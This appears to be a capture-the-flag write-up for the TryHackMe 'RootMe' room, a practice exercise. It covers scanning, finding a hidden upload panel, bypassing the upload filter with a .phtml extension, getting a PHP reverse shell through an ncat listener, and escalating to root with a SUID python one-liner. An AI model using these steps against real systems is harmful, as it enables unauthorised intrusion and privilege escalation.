In this blog, you will learn about how to hack RootMe machine from TryHackMe.
So let’s jump straight to TryHackMe and deploy the machine here is the link for the machine: https://www.tryhackme.com/room/rrootme
Start the machine.
1. Deploy the machine
– No answer needed.
Reconnaissance refers to the practice of covertly gathering data online. This intelligence gathering can be done with both pure and impure intentions. We are doing it with pure intentions on this test machine named RootMe. So let’s perform a quick NMAP scan and find information about the target.
To scan a network you can use following command:
nmap -A -T4 <MACHINE_IP> |
1. Scan the rootme machine, how many ports are open?
– 2
2. What version of Apache is running?
– 2.4.29
3. What service is running on port 22?
– ssh
4. Find directories on the web server using the GoBuster tool.
To brute-force directories you can use following command:
gobuster dir -u <URL> -w <WORDLIST_LOCATION> |
– No answer needed.
5. What is the hidden directory?
– /panel/
Navigate to URL: http://<MACHINE_IP>
It’s a basic web page and nothing interesting.
Let’s check the source code of a website, sometimes you’ll end up getting sensitive endpoints, passwords, hidden paths, and secret keys inside the source code.
Here we got nothing in source code, Let’s see what’s in the hidden directory /panel/ we previously discovered using gobuster.
Navigating to URL: http://<MACHINE_IP>/panel
Here we found a file upload functionality where we can upload files.
Ah!!!! What if we can upload malicious .php files? Let’s check.
Tried .php – Denied.
Tried .phtml – Success !!!!
Wanna know how I did this? It’s called file upload restrictions bypass.
To learn in depth about this do visit: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
Now we can upload a php reverse shell here, we’ll use pentestmonkey php-reverse-shell.php script to obtain the reverse shell using netcat.
Download the script, remember to replace the $ip in the script with your machine ip and $port with anything, I’ll be using 1337.
Netcat listener can be started using following command:
ncat -nlvp <PORT_NUMBER> |
Now we’ll gain reverse shell by executing the uploaded script by visiting following url:
http://<MACHINE_IP>/uploads/php-reverse-shell.phtml
Voilla !!!!!
We have successfully gained a shell.
But the shell is not stable, let’s make this shell stable using following command:
python3 -c “import pty;pty.spawn(‘/bin/bash’)” |
And find the user.txt file using following command:
find / -type f -name user.txt 2>/dev/null |
We have found user.txt file and it’s inside /var/www/
To read data inside file you can use following command:
cat /var/www/user.txt |
1. user.txt
– THM{XXXXXXXXXXXXXXXX}
To escalate privilege we need to hunt for the files with SUID permission.
and this can be achieved using following command:
find / -type f -user root -perm -4000 2>/dev/null |
Ah!!!!!!! Here /usr/bin/python have SUID permission – Interesting.
1. Search for files with SUID permission, which file is weird?
– /usr/bin/python
2. Find a form to escalate your privileges.
– No answer needed.
Let’s escalate our privileges.
We got commands for privilege escalation, here we can skip the first command as the python binary already has SUID permission. Copy and paste the command in the terminal without ./ to see if it works.
python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’ |
Voilla!!!!!! It works.
We have successfully escalated our privileges.
As we are root now, Let’s hunt for the root flag.
It’s in the /root directory.
cat /root/user.txt |
1. root.txt
– THM{XXXXXXXXXXXXXXXX}
DONE. ROOM COMPLETED!!!!!
Salud!!!!!
The RootMe CTF is aimed at beginners and I will recommend all beginners to try and root it.